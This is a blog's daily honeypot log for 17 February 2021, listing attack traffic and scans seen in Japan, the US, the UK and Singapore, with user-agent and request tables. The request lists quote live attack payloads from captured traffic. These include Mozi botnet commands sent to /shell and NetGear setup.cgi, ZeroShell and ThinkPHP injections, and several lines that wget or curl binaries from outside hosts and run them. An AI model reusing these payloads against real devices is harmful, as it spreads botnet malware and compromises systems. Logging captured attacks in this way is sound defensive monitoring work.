コンニチハレバレトシタアオゾラ

With nothing better to do, I spend the whole day in front of my blog, jotting down at random the idle thoughts that drift through my mind,

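2021/02/17 Honeypot (provisional) observation log

This is the honeypot (provisional) observation log for 2021/02/17.

Highlights
Common

Access targeting GPON router vulnerabilities
Access targeting the Liferay Portal JSON Web Service vulnerability (CVE-2020-7961)
Access targeting the PHPUnit vulnerability (CVE-2017-9841)
Access targeting ThinkPHP vulnerabilities
Scanning by zgrab
Scanning for Apache Solr
Scanning for Laravel
Scanning for WordPress
Scanning for WordPress plugins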

Location:JP

Access targeting FCKEditor vulnerabilities
Access targeting NetGear product vulnerabilities
Access targeting Spring Boot vulnerabilities
Scanning by Anarchy99
Scanning for Apache Tomcat
were observed.

Location:US

Access targeting NetGear product vulnerabilities
Access targeting Spring Boot vulnerabilities
Scanning by Anarchy99
Scanning for Apache Tomcat
Scanning for phpMyAdmin
Access with the UserAgent Hello, World
Access with the UserAgent Hello, world
were observed.

The following accesses to /shell were observed.

cd /tmp;
rm -rf *;
wget http[:]//120[.]209[.]126[.]240:41650/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

cd /tmp;
rm -rf *;
wget http[:]//42[.]225[.]53[.]150:35883/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

Location:UK

Access targeting the ZeroShell Linux Router vulnerability (CVE-2020-29390)
Scanning for Apache Tomcat
Unauthorized traffic related to 5[.]188[.]210[.]227
Access with the UserAgent Hello, World
were observed.

Location:SG

Access targeting the ZeroShell Linux Router vulnerability (CVE-2020-29390)
Scanning by Anarchy99
Scanning by bitdiscovery
Scanning for Apache Tomcat
Scanning for /[a-z0-9]\.(gz|tar|tar.bz2|txt|zip)
Unauthorized traffic related to 5[.]188[.]210[.]227
were observed.

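Access count trend

JP: total accesses: 76 (change from previous day: +24)
US: total accesses: 147 (change from previous day: -10)
UK: total accesses: 74 (change from previous day: +29)
SG: total accesses: 347 (change from previous day: +297)

For practical reasons, GET / HTTP/1.1 and POST / HTTP/1.1 requests are excluded.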

Location:JP

Source IP addresses


UserAgent list

Count UserAgent
12 -
1 Anarchy99
4 Go-http-client/1.1
4 Mozilla 5/0
3 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4; rv:52.7.1) Gecko/20100101 Firefox/52.7.1
1 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
9 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
13 Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
4 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
3 Mozilla/5.0 zgrab/0.x
1 User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705

Request list

Count Method Request Protocol
1 \x03
2 \x16\x03\x01
1 CONNECT www[.]bing[.]com/:443 HTTP/1.1
14 GET /.env HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /ReportServer HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /admin/includes/general.js HTTP/1.1
1 GET /admin/view/javascript/common.js HTTP/1.1
1 GET /administrator/ HTTP/1.1
1 GET /administrator/help/en-GB/toc.json HTTP/1.1
1 GET /administrator/language/en-GB/install.xml HTTP/1.1
2 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
3 GET /favicon.ico HTTP/1.1
1 GET /fckeditor/editor/filemanager/connectors/php/upload.php?Type=Media HTTP/1.1
1 GET /home.php HTTP/1.1
1 GET /images/editor/separator.gif HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
3 GET /jenkins/login HTTP/1.0
1 GET /js/header-rollup-554.js HTTP/1.1
3 GET /login HTTP/1.0
4 GET /manager/html HTTP/1.1
1 GET /misc/ajax.js HTTP/1.1
1 GET /owa HTTP/1.1
1 GET /plugins/system/debug/debug.xml HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//101[.]0[.]34[.]43:55056/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /solr/ HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/build.xml HTTP/1.1
2 GET /vendor/phpunit/phpunit/phpunit.xml HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /webfig/ HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET /wp-includes/js/jquery/jquery.js HTTP/1.1
3 GET /wp-login.php HTTP/1.1
1 GET http[:]//www[.]bing[.]com/ HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /api/jsonws/invoke HTTP/1.1
4 POST /boaform/admin/formLogin HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST http[:]//seduced[.]xyz/770ff81ae4d4371f9639f4dfd4115a27d776f16dc93e0606fcf925b29811ae76419ad761d9d9931866ebedec5fa68459e7ee72b1089059dc7e6977e6a0111c3c31f3c001bd16c305f701b3b13a0b4081d2effc4609b356eb0451e6a8ae316763 HTTP/1.1
1 \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf

Location:US

Source IP addresses


UserAgent list

Count UserAgent
9 -
1 Anarchy99
1 Go-http-client/1.1
2 Hello, World
2 Hello, world
2 Mozilla 5/0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
101 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
1 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
5 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
4 Mozilla/5.0 zgrab/0.x
1 python-requests/2.25.1

Request list

Count Method Request Protocol
2 \x03
1 \x16\x03\x01
8 GET /.env HTTP/1.1
1 GET /0bef HTTP/1.0
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /ReportServer HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /actuator/health HTTP/1.1
2 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /jenkins/login HTTP/1.0
1 GET /login HTTP/1.0
1 GET /manager/html HTTP/1.1
101 GET /phpmyadmin/ HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /server-status HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//125[.]41[.]11[.]133:53192/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//120[.]209[.]126[.]240:41650/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//42[.]225[.]53[.]150:35883/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/phpunit.xml HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /webfig/ HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET /wp-login.php HTTP/1.1
1 OPTIONS / HTTP/1.0
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
2 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /api/jsonws/invoke HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf

Location:UK

Source IP addresses


UserAgent list

Count UserAgent
26 -
2 Go-http-client/1.1
1 Hello, World
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
6 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
4 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)
3 Mozilla/5.0 zgrab/0.x
1 Mozilla/5.01688858 Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36
4 PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3
3 python-requests/2.25.1

Request list

Count Method Request Protocol
4 -
1 \x03
1 \x16\x03\x01
1 CONNECT cn[.]bing[.]com/:443 HTTP/1.1
2 CONNECT www[.]baidu[.]com/:443 HTTP/1.1
1 CONNECT www[.]so[.]com/:443 HTTP/1.1
1 CONNECT www[.]voanews[.]com/:443 HTTP/1.1
4 GET /.env HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /ReportServer HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
14 GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0
2 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
2 GET /favicon.ico HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
2 GET /jenkins/login HTTP/1.0
2 GET /login HTTP/1.0
2 GET /manager/html HTTP/1.1
1 GET /portal/redlion HTTP/1.1
3 GET /public/index.php?s=/Index/%09hink%07pp/invokefunction&function=call_user_func_array&vars%5B0%5D=shell_exec&vars%5B1%5D%5B%5D=curl%205.180.211.73/thinkphp HTTP/1.1
1 GET /solr/ HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /webfig/ HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
2 GET /wp-login.php HTTP/1.1
1 GET http[:]//5[.]188[.]210[.]227/echo.php HTTP/1.1
1 GET http[:]//azenv[.]net/ HTTP/1.1
1 GET http[:]//dongtaiwang[.]com/ HTTP/1.1
1 GET http[:]//www[.]epochtimes[.]com/ HTTP/1.1
1 GET http[:]//www[.]minghui[.]org/ HTTP/1.1
1 GET http[:]//www[.]rfa[.]org/english/ HTTP/1.1
1 GET http[:]//www[.]soso[.]com/ HTTP/1.1
1 GET http[:]//www[.]wujieliulan[.]com/ HTTP/1.1
1 HEAD / HTTP/1.1
1 HEAD http[:]//110[.]242[.]68[.]4/ HTTP/1.1
1 OPTIONS / HTTP/1.0
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /api/jsonws/invoke HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1

Location:SG

Source IP addresses


UserAgent list

Count UserAgent
9 -
1 Anarchy99
4 Go-http-client/1.1
181 Mozilla/5.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
101 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
18 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
9 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
2 Mozilla/5.0 zgrab/0.x
1 bitdiscovery
2 python-requests/2.3.0 CPython/2.7.18 Windows/10

Request list

Count Method Request Protocol
3 -
1 \x03
1 \x16\x03\x01
4 GET /.env HTTP/1.1
1 GET /0.gz HTTP/1.1
1 GET /0.tar HTTP/1.1
1 GET /0.tar.bz2 HTTP/1.1
1 GET /0.txt HTTP/1.1
1 GET /0.zip HTTP/1.1
1 GET /1.gz HTTP/1.1
1 GET /1.tar HTTP/1.1
1 GET /1.tar.bz2 HTTP/1.1
1 GET /1.txt HTTP/1.1
1 GET /1.zip HTTP/1.1
1 GET /2.gz HTTP/1.1
1 GET /2.tar HTTP/1.1
1 GET /2.tar.bz2 HTTP/1.1
1 GET /2.txt HTTP/1.1
1 GET /2.zip HTTP/1.1
1 GET /3.gz HTTP/1.1
1 GET /3.tar HTTP/1.1
1 GET /3.tar.bz2 HTTP/1.1
1 GET /3.txt HTTP/1.1
1 GET /3.zip HTTP/1.1
1 GET /4.gz HTTP/1.1
1 GET /4.tar HTTP/1.1
1 GET /4.tar.bz2 HTTP/1.1
1 GET /4.txt HTTP/1.1
1 GET /4.zip HTTP/1.1
1 GET /5.gz HTTP/1.1
1 GET /5.tar HTTP/1.1
1 GET /5.tar.bz2 HTTP/1.1
1 GET /5.txt HTTP/1.1
1 GET /5.zip HTTP/1.1
1 GET /6.gz HTTP/1.1
1 GET /6.tar HTTP/1.1
1 GET /6.tar.bz2 HTTP/1.1
1 GET /6.txt HTTP/1.1
1 GET /6.zip HTTP/1.1
1 GET /7.gz HTTP/1.1
1 GET /7.tar HTTP/1.1
1 GET /7.tar.bz2 HTTP/1.1
1 GET /7.txt HTTP/1.1
1 GET /7.zip HTTP/1.1
1 GET /8.gz HTTP/1.1
1 GET /8.tar HTTP/1.1
1 GET /8.tar.bz2 HTTP/1.1
1 GET /8.txt HTTP/1.1
1 GET /8.zip HTTP/1.1
1 GET /9.gz HTTP/1.1
1 GET /9.tar HTTP/1.1
1 GET /9.tar.bz2 HTTP/1.1
1 GET /9.txt HTTP/1.1
1 GET /9.zip HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
2 GET /TP/html/public/index.php HTTP/1.1
2 GET /TP/index.php HTTP/1.1
2 GET /TP/public/index.php HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /a.gz HTTP/1.1
1 GET /a.tar HTTP/1.1
1 GET /a.tar.bz2 HTTP/1.1
1 GET /a.txt HTTP/1.1
1 GET /a.zip HTTP/1.1
1 GET /actuator/health HTTP/1.1
2 GET /app/.env HTTP/1.1
1 GET /b.gz HTTP/1.1
1 GET /b.tar HTTP/1.1
1 GET /b.tar.bz2 HTTP/1.1
1 GET /b.txt HTTP/1.1
1 GET /b.zip HTTP/1.1
1 GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0
1 GET /c.gz HTTP/1.1
1 GET /c.tar HTTP/1.1
1 GET /c.tar.bz2 HTTP/1.1
1 GET /c.txt HTTP/1.1
1 GET /c.zip HTTP/1.1
2 GET /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type='%0a/etc/sudo%20tar%20-cf%20/dev/null%20/dev/null%20--checkpoint=1%20--checkpoint-action=exec=%22wget%20http[:]//198[.]144[.]190[.]5/bins/keksec.x86%20-O%20/tmp/.keksec.x86;curl%20http[:]//198[.]144[.]190[.]5/bins/keksec.x86%20-O%20/tmp/.keksec.x86;%20chmod%20777%20/tmp/.keksec.x86;%20/tmp/.keksec.x86%22%0a' HTTP/1.1
2 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
2 GET /core/.env HTTP/1.1
1 GET /d.gz HTTP/1.1
1 GET /d.tar HTTP/1.1
1 GET /d.tar.bz2 HTTP/1.1
1 GET /d.txt HTTP/1.1
1 GET /d.zip HTTP/1.1
1 GET /e.gz HTTP/1.1
1 GET /e.tar HTTP/1.1
1 GET /e.tar.bz2 HTTP/1.1
1 GET /e.txt HTTP/1.1
1 GET /e.zip HTTP/1.1
2 GET /elrekt.php HTTP/1.1
1 GET /f.gz HTTP/1.1
1 GET /f.tar HTTP/1.1
1 GET /f.tar.bz2 HTTP/1.1
1 GET /f.txt HTTP/1.1
1 GET /f.zip HTTP/1.1
1 GET /g.gz HTTP/1.1
1 GET /g.tar HTTP/1.1
1 GET /g.tar.bz2 HTTP/1.1
1 GET /g.txt HTTP/1.1
1 GET /g.zip HTTP/1.1
1 GET /h.gz HTTP/1.1
1 GET /h.tar HTTP/1.1
1 GET /h.tar.bz2 HTTP/1.1
1 GET /h.txt HTTP/1.1
1 GET /h.zip HTTP/1.1
1 GET /home.php HTTP/1.1
2 GET /html/public/index.php HTTP/1.1
1 GET /i.gz HTTP/1.1
1 GET /i.tar HTTP/1.1
1 GET /i.tar.bz2 HTTP/1.1
1 GET /i.txt HTTP/1.1
1 GET /i.zip HTTP/1.1
2 GET /index.php HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
2 GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1
1 GET /j.gz HTTP/1.1
1 GET /j.tar HTTP/1.1
1 GET /j.tar.bz2 HTTP/1.1
1 GET /j.txt HTTP/1.1
1 GET /j.zip HTTP/1.1
1 GET /jenkins/login HTTP/1.0
1 GET /k.gz HTTP/1.1
1 GET /k.tar HTTP/1.1
1 GET /k.tar.bz2 HTTP/1.1
1 GET /k.txt HTTP/1.1
1 GET /k.zip HTTP/1.1
1 GET /l.gz HTTP/1.1
1 GET /l.tar HTTP/1.1
1 GET /l.tar.bz2 HTTP/1.1
1 GET /l.txt HTTP/1.1
1 GET /l.zip HTTP/1.1
1 GET /login HTTP/1.0
1 GET /m.gz HTTP/1.1
1 GET /m.tar HTTP/1.1
1 GET /m.tar.bz2 HTTP/1.1
1 GET /m.txt HTTP/1.1
1 GET /m.zip HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /n.gz HTTP/1.1
1 GET /n.tar HTTP/1.1
1 GET /n.tar.bz2 HTTP/1.1
1 GET /n.txt HTTP/1.1
1 GET /n.zip HTTP/1.1
1 GET /o.gz HTTP/1.1
1 GET /o.tar HTTP/1.1
1 GET /o.tar.bz2 HTTP/1.1
1 GET /o.txt HTTP/1.1
1 GET /o.zip HTTP/1.1
1 GET /p.gz HTTP/1.1
1 GET /p.tar HTTP/1.1
1 GET /p.tar.bz2 HTTP/1.1
1 GET /p.txt HTTP/1.1
1 GET /p.zip HTTP/1.1
101 GET /phpmyadmin/ HTTP/1.1
1 GET /portal/redlion HTTP/1.1
2 GET /public/.env HTTP/1.1
2 GET /public/index.php HTTP/1.1
1 GET /q.gz HTTP/1.1
1 GET /q.tar HTTP/1.1
1 GET /q.tar.bz2 HTTP/1.1
1 GET /q.txt HTTP/1.1
1 GET /q.zip HTTP/1.1
1 GET /r.gz HTTP/1.1
1 GET /r.tar HTTP/1.1
1 GET /r.tar.bz2 HTTP/1.1
1 GET /r.txt HTTP/1.1
1 GET /r.zip HTTP/1.1
1 GET /s.gz HTTP/1.1
1 GET /s.tar HTTP/1.1
1 GET /s.tar.bz2 HTTP/1.1
1 GET /s.txt HTTP/1.1
1 GET /s.zip HTTP/1.1
1 GET /solr/ HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /t.gz HTTP/1.1
1 GET /t.tar HTTP/1.1
1 GET /t.tar.bz2 HTTP/1.1
1 GET /t.txt HTTP/1.1
1 GET /t.zip HTTP/1.1
2 GET /thinkphp/html/public/index.php HTTP/1.1
1 GET /u.gz HTTP/1.1
1 GET /u.tar HTTP/1.1
1 GET /u.tar.bz2 HTTP/1.1
1 GET /u.txt HTTP/1.1
1 GET /u.zip HTTP/1.1
1 GET /v.gz HTTP/1.1
1 GET /v.tar HTTP/1.1
1 GET /v.tar.bz2 HTTP/1.1
1 GET /v.txt HTTP/1.1
1 GET /v.zip HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /w.gz HTTP/1.1
1 GET /w.tar HTTP/1.1
1 GET /w.tar.bz2 HTTP/1.1
1 GET /w.txt HTTP/1.1
1 GET /w.zip HTTP/1.1
1 GET /webfig/ HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET /wp-login.php HTTP/1.1
1 GET /x.gz HTTP/1.1
1 GET /x.tar HTTP/1.1
1 GET /x.tar.bz2 HTTP/1.1
1 GET /x.txt HTTP/1.1
1 GET /x.zip HTTP/1.1
1 GET /xaa HTTP/1.1
1 GET /y.gz HTTP/1.1
1 GET /y.tar HTTP/1.1
1 GET /y.tar.bz2 HTTP/1.1
1 GET /y.txt HTTP/1.1
1 GET /y.zip HTTP/1.1
1 GET /z.gz HTTP/1.1
1 GET /z.tar HTTP/1.1
1 GET /z.tar.bz2 HTTP/1.1
1 GET /z.txt HTTP/1.1
1 GET /z.zip HTTP/1.1
1 GET http[:]//5[.]188[.]210[.]227/echo.php HTTP/1.1
1 HEAD / HTTP/1.1
1 OPTIONS / HTTP/1.0
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /api/jsonws/invoke HTTP/1.1
2 POST /boaform/admin/formLogin HTTP/1.1
2 POST /index.php?s=captcha HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1